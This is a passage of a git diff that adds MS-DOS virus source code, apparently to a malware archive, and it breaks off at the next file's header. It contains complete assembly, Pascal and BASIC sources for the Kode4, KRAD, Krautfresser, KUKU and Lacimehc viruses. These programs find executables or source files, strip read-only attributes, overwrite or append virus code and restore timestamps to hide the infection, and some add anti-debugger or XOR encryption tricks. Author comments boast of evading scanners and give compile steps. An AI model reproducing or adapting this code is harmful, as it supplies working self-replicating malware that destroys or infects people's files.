installiation + + mov ax,0ff0fh + int 21h + cmp ax,0101h ;Abort if Virex Protection + je done ; present + + + mov ah,4Eh ;Find first Com file + mov dx,offset filename ;use "*.com" + int 21h + +Back: + mov ah,43h ;get rid of read only + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01 + and cx,11111110b + int 21h + + mov ax,3D01h ;Open file for writing + mov dx,9Eh ;get file name from file DTA + int 21h + + mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + + mov dx,100h ;Start writing at 100h + mov cl,v_length ;write 46 bytes + mov ah,40h ;Write Data into the file + int 21h + + + pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + + jnc Back + mov ah,9h + mov dx,offset DATA + int 21h + +done: int 20h ;Terminate Program +filename db "*.c*",0 +DATA db " -=+ Kode4 +=-, The one and ONLY!$" + + +kode4 endp +LAST label near +seg_a ends + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4-2.asm b/MSDOS/Virus.MSDOS.Unknown.kode4-2.asm new file mode 100644 index 00000000..ff4a9ef2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kode4-2.asm @@ -0,0 +1,185 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h +V_Length equ vend-vstart +KODE4 proc far +start label near + db 0E9h,00h,00h + + +vstart equ $ + + mov si,100h ;get si to point to 100 + mov di,102h ;get di to point to 102 +lback: inc di ;increment di + mov ax,word ptr [si] ;si is ponting to ax + cmp word ptr [di],ax ;compare ax with di loc + jne lback ;INE go back and inc di + + + mov ax,word ptr [si+1] + cmp ax,word ptr [di+1] + je lout + jmp lback + +lout: add di,3h ;jmp stored in the end + sub di,(v_length+100h) ;+3 to get to end and - + mov si,di ; +;********************************************************************** +;* +;* The above code can be re-written as follows... +;* The above idea, although it works is very long in code.... +;* when DOS does a load and execute it pushes all registers the last +;* register to be pushed contains the file length. so just subtract +;* the current location +;********************************************************************** +; +; +; +;Host_Off: pop bp +; sub bp,offset host_off +; mov si,bp +; +;*** Before opening any file copy the original three bytes back to 100h +;*** Because they will get overwritten when you check any new files + lea di,temp_buff + add di,si + mov ax,word ptr [di] + mov cl,byte ptr [di+2] + mov di,100h + mov word ptr [di],ax + mov byte ptr [di+2],cl + + + mov ah,4Eh ;Find first Com file + mov dx,offset filename ; offset of "*.com" + add dx,si + int 21h + jnc back + jmp done +Back: + mov ah,43h ;get rid of read only + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01 + and cx,11111110b + int 21h + + mov ax,3D02h ;Open file for read/writing + mov dx,9Eh ;get file name from file DTA + int 21h + jnc next + jmp done +next: mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + mov ax,4200h ; Move ptr to start of file + xor cx,cx + xor dx,dx + int 21h + + + mov ah,3fh ;load first 3 bytes + mov cx,3 + + mov dx,offset temp_buff + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax,4202h + int 21h + sub ax,3 ; Fix for real location + push ax + ; nop ; + ; nop ; used for debugging + ; nop ; + ; nop ; + ; nop + + mov di,offset temp_buff + add di,si + mov word ptr [j_code2+si],ax; Save two bytes in a + ; word [jumpin] + + cmp byte ptr [di],0e9h ;look for a jmp at begining + jne infect + + mov cx,word ptr [di+1] ;check for XXX bytes at end + pop ax + sub ax,v_length + cmp ax, cx ; jump (id string to check) + jne infect + jmp finish + + + +infect: + + xor cx,cx ;move file pointer to begining + xor dx,dx ;to write jump + mov ax,4200h + int 21h + + mov ah,40h ;write jump in first 3 bytes + mov cx,3 + mov dx, offset j_code1 + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax, 4202h + int 21h + + mov dx,offset vstart + add dx,si ;Start writing at top of virus + mov cx,(vend-vstart) ; Set for length of virus + mov ah,40h ;Write Data into the file + int 21h + + +Finish: pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + jc done + jmp back + +done: + mov bp,100h + jmp bp + + +filename db "*.com",0 +DATA db " -=+ Kode4 +=-, The one and ONLY!$" + +j_code1 db 0e9h +j_code2 db 00h,00h +temp_buff db 0cdh,020h,090h ; CD 20 NOP +kode4 endp + +vend equ $ + +seg_a ends + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4.asm b/MSDOS/Virus.MSDOS.Unknown.kode4.asm new file mode 100644 index 00000000..77e242c6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kode4.asm @@ -0,0 +1,100 @@ +ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92 + +Article Title: Kode 4 v1 Virus +Author: Soltan Griss + + +;###################################################################### +;# Name: Kode4 version 1.0 (overwritting stage) +;# Author: Soltan Griss [YAM] +;# +;# Description: What this sucker does is very simple. it overwrites +;# the first 46 bytes of all com files in the current +;# directory, with it's own code... as of scanv93, this +;# virus is undetectable.. +;# +;# +;# Special Thanks go out to Data Disruptor.. If it were not for you i +;# would still be fucking lost!!!! +;# +;###################################################################### + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h +V_Length equ last-start +KODE4 proc far + +start label near ;Check for Virex installiation + + mov ax,0ff0fh + int 21h + cmp ax,0101h ;Abort if Virex Protection + je done ; present + + + mov ah,4Eh ;Find first Com file + mov dx,offset filename ;use "*.com" + int 21h + +Back: + mov ah,43h ;get rid of read only + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01 + and cx,11111110b + int 21h + + mov ax,3D01h ;Open file for writing + mov dx,9Eh ;get file name from file DTA + int 21h + + mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + + mov dx,100h ;Start writing at 100h + mov cl,v_length ;write 46 bytes + mov ah,40h ;Write Data into the file + int 21h + + + pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + + jnc Back + mov ah,9h + mov dx,offset DATA + int 21h + +done: int 20h ;Terminate Program +filename db "*.c*",0 +DATA db " -=+ Kode4 +=-, The one and ONLY!$" + + +kode4 endp +LAST label near +seg_a ends + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm b/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm new file mode 100644 index 00000000..2e211e3d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm @@ -0,0 +1,191 @@ +ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92 + +Article Title: Kode 4 v2 Virus +Author: Soltan Griss + + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h +V_Length equ vend-vstart +KODE4 proc far +start label near + db 0E9h,00h,00h + + +vstart equ $ + + mov si,100h ;get si to point to 100 + mov di,102h ;get di to point to 102 +lback: inc di ;increment di + mov ax,word ptr [si] ;si is ponting to ax + cmp word ptr [di],ax ;compare ax with di loc + jne lback ;INE go back and inc di + + + mov ax,word ptr [si+1] + cmp ax,word ptr [di+1] + je lout + jmp lback + +lout: add di,3h ;jmp stored in the end + sub di,(v_length+100h) ;+3 to get to end and - + mov si,di ; +;********************************************************************** +;* +;* The above code can be re-written as follows... +;* The above idea, although it works is very long in code.... +;* when DOS does a load and execute it pushes all registers the last +;* register to be pushed contains the file length. so just subtract +;* the current location +;********************************************************************** +; +; +; +;Host_Off: pop bp +; sub bp,offset host_off +; mov si,bp +; +;*** Before opening any file copy the original three bytes back to 100h +;*** Because they will get overwritten when you check any new files + lea di,temp_buff + add di,si + mov ax,word ptr [di] + mov cl,byte ptr [di+2] + mov di,100h + mov word ptr [di],ax + mov byte ptr [di+2],cl + + + mov ah,4Eh ;Find first Com file + mov dx,offset filename ; offset of "*.com" + add dx,si + int 21h + jnc back + jmp done +Back: + mov ah,43h ;get rid of read only + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01 + and cx,11111110b + int 21h + + mov ax,3D02h ;Open file for read/writing + mov dx,9Eh ;get file name from file DTA + int 21h + jnc next + jmp done +next: mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + mov ax,4200h ; Move ptr to start of file + xor cx,cx + xor dx,dx + int 21h + + + mov ah,3fh ;load first 3 bytes + mov cx,3 + + mov dx,offset temp_buff + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax,4202h + int 21h + sub ax,3 ; Fix for real location + push ax + ; nop ; + ; nop ; used for debugging + ; nop ; + ; nop ; + ; nop + + mov di,offset temp_buff + add di,si + mov word ptr [j_code2+si],ax; Save two bytes in a + ; word [jumpin] + + cmp byte ptr [di],0e9h ;look for a jmp at begining + jne infect + + mov cx,word ptr [di+1] ;check for XXX bytes at end + pop ax + sub ax,v_length + cmp ax, cx ; jump (id string to check) + jne infect + jmp finish + + + +infect: + + xor cx,cx ;move file pointer to begining + xor dx,dx ;to write jump + mov ax,4200h + int 21h + + mov ah,40h ;write jump in first 3 bytes + mov cx,3 + mov dx, offset j_code1 + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax, 4202h + int 21h + + mov dx,offset vstart + add dx,si ;Start writing at top of virus + mov cx,(vend-vstart) ; Set for length of virus + mov ah,40h ;Write Data into the file + int 21h + + +Finish: pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + jc done + jmp back + +done: + mov bp,100h + jmp bp + + +filename db "*.com",0 +DATA db " -=+ Kode4 +=-, The one and ONLY!$" + +j_code1 db 0e9h +j_code2 db 00h,00h +temp_buff db 0cdh,020h,090h ; CD 20 NOP +kode4 endp + +vend equ $ + +seg_a ends + + end start + + diff --git a/MSDOS/Virus.MSDOS.Unknown.krad.pas b/MSDOS/Virus.MSDOS.Unknown.krad.pas new file mode 100644 index 00000000..8bab4190 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.krad.pas @@ -0,0 +1,137 @@ +Program KRAD; + +{ ____ _____ _______ ______ + /___/\/____/\ /______/\ /_____/\___ __/\_____ + \ \| \ \___| \ | \___/ /_ ___/ BOOM! <====== + \ \/___| + \| + |/ /_/\/ + \______|\___________|\___________/ + + + Virus Laboratories and Distribution + Proudly present the KRAD Virus + Written by Metabolis for non assembler ppls + + + Why call it the KRAD virus? Cos it is! A companion virus + written in Turbo Pascal, well that just sums it up. I wrote + this for two reasons.. 1) Not everyone knows assembler 2) + a friend reckoned a virus couldn't be programmed in Turbo + Pascal.. (by that he meant *I* couldn't do it). No matter + how lame.. it's still a virus! (Right up there with Aids/ + Number 1 :)) Fully commented for non understanding Pascal + people, (a very small part of the world). + + Compress this with DIET/PkLite/LZEXE or something similar + when it's compiled. Then rename it to a .COM file and hey + presto, you can run it! I guess an added bonus of this + virus is, if there's another companion virus on your system + it won't overwrite it, it will take that as an infection + and leave it alone. + + KRAD virus will immediately infect C:\DOS or C:\MSDOS if + they exist, so if any DOS .EXE files are run it will infect + all the files in the current dir that you ran the DOS + command from. } + +Uses Dos,Crt; {Even if I don't use one of 'em.. + it's best to include both. } + +{$M 59999,0,8000} {This program needs memory for two things.. + 1) To use as a buffer when copying the virus + 2) To execute the program originally run. } + +Var Inf,Inf2:Searchrec; {Used in the EXE and file_exist routines } + Infected:Boolean; {Is a file infected? } + Params:Byte; {Loop Index for adding all parameters together } + All_Params:String; {This string contains the whole list of parameters + originally passed to the program } + P:PathStr; { Used by the FSplit procedure. } + D:DirStr; { "" } + N:NameStr; { "" } + E:ExtStr; { "" } + +Procedure Check_Infected(Path:String); +{Is the .EXE file we've found infected? } +Begin + FSplit(Inf.Name,D,N,E); {Split it up into directory, name + and extension. } + FindFirst(Path+N+'.COM',Anyfile,Inf2); {Look for the .COM file with the + same file name, if this exists + then the file is already infected. } + Infected:=(DosError=0); {Set the Infected flag } +End; + +Procedure CopyFile(SourceFile, TargetFile:string); +{Straight Forward copying routine, I won't comment all of this.. } +var + Source, + Target : file; + BRead, + Bwrite : word; + FileBuf : array[1..2048] of char; +Begin + Assign(Source,SourceFile); + SetFattr(Source,$20); {Set the file attributes of the + hidden COM companion we're going + to be copying to archive so that + it's possible read it. } + {$I-} + Reset(Source,1); + {$I+} + If IOResult < 0 then + Begin + Exit; {Couldn't open the source file! } + End; + Assign(Target,TargetFile); + {$I-} + Rewrite(Target,1); + {$I+} + If IOResult < 0 then + Begin + Exit; {Couldn't open the target file! } + End; + Repeat + BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead); + BlockWrite(Target,FileBuf,Bread,Bwrite); + Until (Bread = 0) or (Bread < BWrite); + Close(Source); + Close(Target); + SetFattr(Source,3); {Set the COM companion that we + copied back to hidden and + read-only. } + SetFattr(Target,3); +End; + +Procedure FaI(Path:String); +{Find and Infect!} +Begin + FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! } + While DosError=0 Do Begin + Infected:=False; + Check_Infected(Path); { Check if the .EXE found is already infected. } + If Not Infected then Begin + CopyFile(ParamStr(0),Path+N+'.COM'); + End; + { If the file isn't infected then copy the .COM version of the + file you're executing to companionship with the .EXE you have + found that isn't infected. } + FindNext(Inf); + End; +End; + +Begin + FaI('C:\DOS\'); { Find & Infect! Go for the DOS dirs first } + FaI('C:\MSDOS\'); { because this is where most EXE files will } + FaI(''); { be executed from! } + FSplit(ParamStr(0),D,N,E); { Make sure we have the path and name of the + file we actually want to execute. } + All_Params:=''; { "Remember to initialise those variables!" - Teacher } + For Params:=1 To ParamCount + do All_Params:=All_Params+ParamStr(Params)+' '; + Exec(D+N+'.EXE',All_Params); {Execute the file that the user + wanted to in the first place + keeping all original parameters. } +End. +{Easy wasn't it? I thought so.. } + +This page hosted by Get your own Free Homepage diff --git a/MSDOS/Virus.MSDOS.Unknown.krautfresser.asm b/MSDOS/Virus.MSDOS.Unknown.krautfresser.asm new file mode 100644 index 00000000..50c3c59b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.krautfresser.asm @@ -0,0 +1,110 @@ +.model tiny +.code +org 100h + + +start_virus: +and al,21h + +mov cx,100h ;for tha tbav +abc: ; +loop abc ; + + ;anti_disassembler +mov cx,09ebh +mov ax,0fe05h +jmp $-2 +add ah,03bh +jmp $-10 + + ;anti_debugger +mov ax,3503h ;save int 3h in bx +int 21h ;do it +mov ah,25h ;set new int 3h... +mov dx,offset new_int_3 ;...to new_int_3 +int 21h ;do it +xchg bx,dx ;exchange bx,dx (restore original int 3h) +int 21h ;do it + + + ;anti_vsafe +mov ax,0f9f2h +add ax,10h +mov dx,5935h +add dx,10h +mov bl,10h +sub bl,10h +int 16h + + + +mov ah,5eh ;find first +sub ah,10h + +mov cx,5h ;5 files to infect +push cx + +jmp jojo ;go ta jojo +find_next: +push cx +mov ah,5fh ;find next +sub ah,10h +jojo: +xor cx,cx ;attribut normal +mov dx,offset star_dot_com ;*.COM +int 21h ;do it +jb ende_virus ;no more filz -> ende_virus + +mov ax,3d02h ;open file +mov dx,9eh ;file name +int 21h ;do it + +mov bx,ax ;move file handler in bx + +mov ax,5700h ;get file time +int 21h ;do it + +cmp cx,0000h ;if file time = 0 then infect it +je prepare_for_new ;else goto prepare_for_new file search + +mov ah,50h ;write file (infect it) +sub ah,10h +mov cx,offset fin - offset start_virus ;virus size +mov dx,offset start_virus ;begin at start +int 21h ;do it + +mov ax,5701h ;set infected file time +mov cx,0000h ;to 0000 +int 21h ;do it + +mov ah,3eh ;close file +int 21h ;do it + +pop cx +push cx +loop find_next ;look for tha next file to infect + +ende_virus: +int 20h ;-> exit + +prepare_for_new: ;prepare for the next file search +mov ah,3eh ;close file +int 21h ;do it +pop cx +jmp find_next ;goto find_next file + + +new_int_3: ;new interrupt 3h +mov ah,9h ;write string to standard output +mov dx,offset autor ;[easyman written by spooky] +int 21h ;do it +mov ah,00h ;wait until keypressed +int 16h ;do it +int 20h ;-> terminate debugging + + +autor: db '[Krautfresser written by Spooky]',0dh,0ah ;copyright + db ' 1996 Austria',0dh,0ah,'$' +star_dot_com: db '*.com',0 ;filespec +fin: +end start_virus diff --git a/MSDOS/Virus.MSDOS.Unknown.kuku.bas b/MSDOS/Virus.MSDOS.Unknown.kuku.bas new file mode 100644 index 00000000..46c0714e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kuku.bas @@ -0,0 +1,102 @@ +$event off +defint a-z +screen 0,0,0 +?"KUKU VIRUS Ver. 1.0 (Distribution module.)" +?"Copyright (C) Û IVC Û Moscow groupe.":? +color 15,4: +?"***************************************" +?"* D A N G E R !!! *" +?"* Virus for Turbo Basic source files. *" +?"***************************************":beep +color 7,0 +?:?"Press any key to process ..."; +while inkey$="":wend +?" process"; +CALL kuku +if z=0 then ?"File infected." +if z=11 then ?" imposible (NO FILE FOR INFECTED)." +?:?"About all question call to MOSCOW GROUPE of International +?tab(45);"Viruses" +?tab(45);"Company (IVC, Inc.) +while inkey$="":wend +screen 0,1,0 +sub KUKU + shared z + n$=string$(8,63)+chr$(46)+chr$(66)+chr$(65)+chr$(83):dim dta%(32),find%(32) + for a%=0% to 32%:dta%(a%)=0:next + for z=0 to len(n$)-2 step 2:find%(z/2)=asc(mid$(n$,z+2,1))*256+asc(mid$(n$,z+1,1)):next + reg 1,&h1A00:reg 8,varseg(dta%(0)):reg 4,varptr(dta%(0)):call interrupt &h21 + reg 1,&h4e00:reg 3,attr:reg 8,varseg(find%(0)):reg 4,varptr(find%(0)):call interrupt &h21 + if reg(1)<>0 then p$=string$(15,255):goto findfirst1 + for a=0 to 32:h=dta%(a) and 255:p$=p$+chr$(h):l=(dta%(a)-h)/&h100 and 255:p$=p$+chr$(l):next + findfirst1: + dta$=p$:f$=mid$(dta$,&h1f,13):if f$=string$(len(f$),255) then z=11:exit sub + a=instr(2,f$,chr$(0)):file$=mid$(f$,1,a) + ?:?"Infecting file :"file$ + name file$ as chr$(128) + s1$=chr$(67)+chr$(65)+chr$(76)+chr$(76)+CHR$(32) + s2$=chr$(68)+chr$(65)+chr$(84)+chr$(65) + s$=chr$(75)+chr$(85)+chr$(75)+chr$(85) + open chr$(128) for input as#1 + ?"Size:"lof(1) + open file$ for output as #2 + ? #2,S1$S$chr$(13)chr$(10) + ?"Transfer file ..." + while not eof(1):line input #1,a$:if a$="CALL KUKU" then z=10 + ? #2,a$:wend + if z=10 then ccq + ?#2,chr$(32) + ?"Move data ..." + for a=1 to 2 + restore KukuData + if a=2 then ?#2,S$+s2$+chr$(58) + while QWE$<>chr$(39) + read qwe$ + if a=2 then ?#2,S2$+chr$(34); + ? #2,qwe$ + wend + qwe$=chr$(32) + next + ?#2,chr$(69)+chr$(78)+chr$(68)+chr$(32)+chr$(83)+chr$(85)+chr$(66) + ?"Out size:";lof(2) + close #1,#2:kill chr$(128): + end +ccq: + ?:?"File already infected ...":z=10 + close:kill chr$(128) + exit sub +kukudata: + +data"sub KUKU" +data"' KUKU VIRUS FOR TURBO-BASIC !!!" +data"' This virus make at UPK-2 of Sevastopolsky r-n, Moscow. +data"n$=string$(8,63)+chr$(46)+chr$(66)+chr$(65)+chr$(83):dim dta%(32),find%(32) +data"for a%=0% to 32%:dta%(a%)=0:next +data"for z=0 to len(n$)-2 step 2:find%(z/2)=asc(mid$(n$,z+2,1))*256+asc(mid$(n$,z+1,1)):next +data"reg 1,&h1A00:reg 8,varseg(dta%(0)):reg 4,varptr(dta%(0)):call interrupt &h21 +data"reg 1,&h4e00:reg 3,attr:reg 8,varseg(find%(0)):reg 4,varptr(find%(0)):call interrupt &h21 +data"if reg(1)<>0 then p$=string$(15,255):goto findfirstfile1 +data"for a=0 to 32:h=dta%(a) and 255:p$=p$+chr$(h):l=(dta%(a)-h)/&h100 and 255:p$=p$+chr$(l):next +data"findfirstfile1: +data"dta$=p$:f$=mid$(dta$,&h1f,13):if f$=string$(len(f$),255) then +data"for J=1 to 1500:Sound Rnd(1)*(1500-j)+40,.01:NEXT:delay(2) +data"screen 1:def seg=&Hb800:for a=0 to 16384:poke a,rnd(1)*255:next:exit sub +data"end if +data"a=instr(2,f$,chr$(0)):file$=mid$(f$,1,a):name file$ as chr$(128) +data"s1$=chr$(67)+chr$(65)+chr$(76)+chr$(76)+CHR$(32):s2$=chr$(68)+chr$(65)+chr$(84)+chr$(65):s$=chr$(75)+chr$(85)+chr$(75)+chr$(85) +data"open chr$(128) for input as#1 +data"open file$ for output as #2 +data"? #2,S1$S$chr$(13)chr$(10) +data"while not eof(1):line input #1,a$:? #2,a$:wend +data"?#2,chr$(32) +data"for a=1 to 2:restore KukuData +data"if a=2 then ?#2,S$+s2$ +data"while QWE$<>chr$(39):read qwe$:if a=2 then ?#2,S2$chr$(34); +data"? #2,qwe$+chr$(34):wend +data"qwe$=chr$(32):next +data"?#2,chr$(69)chr$(78)chr$(68)chr$(32)chr$(83)chr$(85)chr$(66) +data"close #1,#2:kill chr$(128):exit sub +data"' KUKU Virus Version 1.0 +data"' (C) ÛIVCÛ Moscow groupe. 25-May-1991. Serial No.0003529 +DATA"'" +end sub \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lacimehc.asm b/MSDOS/Virus.MSDOS.Unknown.lacimehc.asm new file mode 100644 index 00000000..94692892 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lacimehc.asm @@ -0,0 +1,260 @@ +; ------------------------------------------------------------------------- ; +; Lacimehc v1.0 coded by KilJaeden of the Codebreakers 1998 ; +; ------------------------------------------------------------------------- ; +; Description: `-------------------| Started: 13/06/98 | Finished: 15/06/98 ; +; `-------------------^------------------- ; +; v1.0 - first attempt at .EXE infection, probably full of | Size: 597 ; +; - errors and unoptimized stuff, but I will fix all `---------- ; +; - that when I have a better understanding of what the ; +; - hell is actually going on, it's complicated! hehe ; +; v1.1 - added encryption to this exe appender! XOR,ROR,NEG ; +; ------------------------------------------------------------------------- ; +; ---------------> You Cannot Sedate All The Things You Hate <------------- ; +; ------------------------------------------------------------------------- ; +; to compile ::] tasm lacimehc.asm ; +; to link :::::] tlink /t lacimehc.obj ; +; ------------------------------------------------------------------------- ; + +code segment ; name our segment 'code' + assume cs:code,ds:code ; assign CS and DS to code + org 100h ; original is a .com file + +blank: db 0e9h,0,0 ; jump to beginning +start: call delta ; push IP on to the stack +delta: pop bp ; pop it into BP + sub bp,offset delta ; get the delta offset + + push ds es ; save original DS and ES + push cs cs ; push CS twice + pop ds es ; CS = DS = ES now + +decr: jmp once ; jump to once (overwritten) + lea si,[bp+encd] ; points to encrypted area + mov di,si ; move the value into DI + call encr ; call our decryption loop + jmp encd ; jump to main virus + +encr: lodsb ; load a byte into al + ror al,4 ; encryptin 1 + neg al ; encryptin 2 + xor al,byte ptr [bp+key] ; encryptin 3 -final- + neg al ; unencrypt 2 + ror al,4 ; unencrypt 1 + stosb ; return the byte + loop encr ; do this for all bytes + ret ; return from call + key db 0 ; our key value + +encd: mov ax,word ptr [bp+exe_cs] ; exe_cs and _cs + mov word ptr [bp+_cs],ax ; are now equal + + push [bp+exe_cs] ; save CS + push [bp+exe_ip] ; save IP + push [bp+exe_ss] ; save SS + push [bp+exe_sp] ; save SP + + mov ah,1ah ; set new DTA location + lea dx,[bp+offset dta] ; new DTA goes here + int 21h ; DTA is now moved + + mov ah,4eh ; find first file + lea dx,[bp+exefile] ; with extension .exe + mov cx,7 ; possible attributes + +findit: int 21h ; find a .exe + jnc cont ; found one? continue on + jmp exit ; return control to host + +cont: lea dx,[bp+dta+1eh] ; get file name info + mov ax,4300h ; get file attributes + int 21h ; get them now + push cx ; save the attributes + push dx ; and the file name info + + mov ax,4301h ; set file attributes + xor cx,cx ; to none at all + int 21h ; infect even read only now + + mov ax,3d02h ; open the file + int 21h ; file is opened + xchg bx,ax ; move file handle in BX + jnc cont2 ; no problems? continue on + jmp abort ; whoops, find another one + +cont2: mov ax,5700h ; get the time / date stamps + int 21h ; we have the stamps + push cx ; save the time + push dx ; save the date + + mov ah,3fh ; read from file + mov cx,1ch ; read the EXE header + lea dx,[bp+offset header] ; store it into 'header' + int 21h ; do the int 21 this time + + cmp word ptr [bp+header],'ZM' ; check for the initials + je cont3 ; its good, infect it + cmp word ptr [bp+header],'MZ' ; check for the initials + je cont3 ; its good, infect it + jmp next ; find next file + +cont3: cmp word ptr [bp+header+10h],'JK' ; check for our ID bytes + jne cont4 ; not done before, infect it + jmp next ; infected, get another one + +cont4: mov ax,word ptr [bp+header+18h] ; load AX with offset 40h + cmp ax,40h ; is this a WinEXE file? + jnae cont5 ; nope, continue on + jmp next ; yup it is, get another one + +cont5: cmp word ptr [bp+header+1ah],0 ; check for internal overlays + je infect ; nope, infect this file now + jmp next ; there are, get another one + +infect: push bx ; save file handle + mov ax,word ptr [bp+header+0eh] ; get original SS into AX + mov word ptr [bp+exe_ss],ax ; save it into exe_ss + mov ax,word ptr [bp+header+10h] ; get original SP into AX + mov word ptr [bp+exe_sp],ax ; save it into exe_sp + mov ax,word ptr [bp+header+14h] ; get original IP into AX + mov word ptr [bp+exe_ip],ax ; save it into exe_ip + mov ax,word ptr [bp+header+16h] ; get original CS into ax + mov word ptr [bp+exe_cs],ax ; save it into exe_cs + + mov ax,4202h ; scan to end of file + xor cx,cx ; xor cx to 0 + cwd ; likewize for dx + int 21h ; DX:AX holds file size now + push ax dx ; save file size for awhile + + mov bx,word ptr [bp+header+8h] ; header size in paragraphs + mov cl,4 ; load CL with 4 + shl bx,cl ; multiply bx by 16 (4x4=16) + sub ax,bx ; subtract file size + sbb dx,0 ; if CF is set subtract 1 + mov cx,10h ; cx = 10h = 16 + div cx ; undue our mutiplying x16 + + mov word ptr [bp+header+14h],dx ; put the offset in + mov word ptr [bp+header+16h],ax ; segment offset of code + mov word ptr [bp+header+0eh],ax ; segment offset of stack + mov word ptr [bp+header+10h],'JK' ; put our ID in + + pop dx ax bx ; restore file size / handle + + add ax,finished-start ; add our virus size + adc dx,0 ; if CF add 1, if not, 0 + mov cx,512 ; convert to pages + div cx ; by dividing by 512 + inc ax ; round up + mov word ptr [bp+header+4],ax ; put the new PageCnt up + mov word ptr [bp+header+2],dx ; put the new PartPag up + + mov ax,4202h ; scan to end of file + xor cx,cx ; xor cx to 0 + cwd ; likewize for dx + int 21h ; DX:AX holds file size now + + in al,40h ; get a random value + mov byte ptr [bp+key],al ; save as our key + + mov ah,40h ; write to file + lea dx,[bp+start] ; starting here + mov cx,encd-start ; # of bytes to write + int 21h ; write them now + + lea di,[bp+finished] ; where to put bytes + push di ; save value + lea si,[bp+encd] ; where to get bytes + mov cx,finished-encd ; # of bytes to do + push cx ; save value + call encr ; encrypt the bytes + + mov ah,40h ; write to file + pop cx ; restore first value + pop dx ; restore second value + int 21h ; write them to file + + mov ax,4200h ; seek to start of file + xor cx,cx ; cx to 0 + cwd ; likewize for dx + int 21h ; at start of file now + + mov ah,40h ; write to file + lea dx,[bp+header] ; write the new header + mov cx,1ch ; # of bytes to write + int 21h ; write it now + +next: mov ax,5701h ; set time / date stamps + pop dx ; restore the date + pop cx ; restore the time + int 21h ; time / date are restored + + mov ah,3eh ; close the file + int 21h ; close it up now + +abort: mov ax,4301h ; set file attributes + pop dx ; for this file name + pop cx ; with these attributes + int 21h ; attributes are restored + + mov ah,4fh ; find next file + jmp findit ; start all over again + +exit: pop [bp+exe_sp] ; restore SP + pop [bp+exe_ss] ; restore SS + pop [bp+exe_ip] ; restore IP + pop [bp+exe_cs] ; restore CS + + mov ah,1ah ; restore the DTA + mov dx,80h ; new address for DTA + int 21h ; back to original location + + pop es ds ; pop ES and DS from stack + mov ax,es ; ax points to PSP + add ax,10h ; skip over the PSP + add word ptr cs:[bp+_cs],ax ; restoring CS + mov bx,word ptr cs:[bp+exe_ip] ; move the IP into bx + mov word ptr cs:[bp+_ip],bx ; save the IP into _ip + + cli ; clear interrupt flag + mov sp,word ptr cs:[bp+exe_sp] ; adjust ExeSP + add ax,word ptr cs:[bp+exe_ss] ; restore the stack + mov ss,ax ; adjust ReloSS + sti ; set interrupt flag + + db 0eah ; jmp far ptr cs:ip + +; ---------------------------( The Data Area )----------------------------- ; +; ------------------------------------------------------------------------- ; + + _ip dw 0 ; used as offset for db 0eah + _cs dw 0 ; used as offset for db 0eah + exe_cs dw 0fff0h ; original CS + exe_ip dw 0 ; original IP + exe_sp dw 0 ; original SP + exe_ss dw 0 ; original SS + exefile db "*.exe",0 ; infecting .exe files + header db 1ch dup (?) ; space for the header + dta db 43 dup (?) ; space for the new dta + finished: ; end of the virus + +; ---------------------( Not Saved / Not Encrypted )----------------------- ; +; ------------------------------------------------------------------------- ; + +once: lea si,[bp+new] ; bytes to move + lea di,[bp+decr] ; to be moved here + movsw ; move two bytes + movsb ; move one byte + jmp encd ; jump to main body +new: mov cx,finished-encd ; this replaces the jump + +; -----------------------------( The End )--------------------------------- ; +; ------------------------------------------------------------------------- ; + + code ends ; end code segment + end blank ; end / where to start + +; ------------------------------------------------------------------------- ; +; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ; +; ------------------------------------------------------------------------- ; + diff --git a/MSDOS/Virus.MSDOS.Unknown.laicos.asm b/MSDOS/Virus.MSDOS.Unknown.laicos.asm new file mode 100644 index 00000000..2ce80789 --- /dev/null +++ 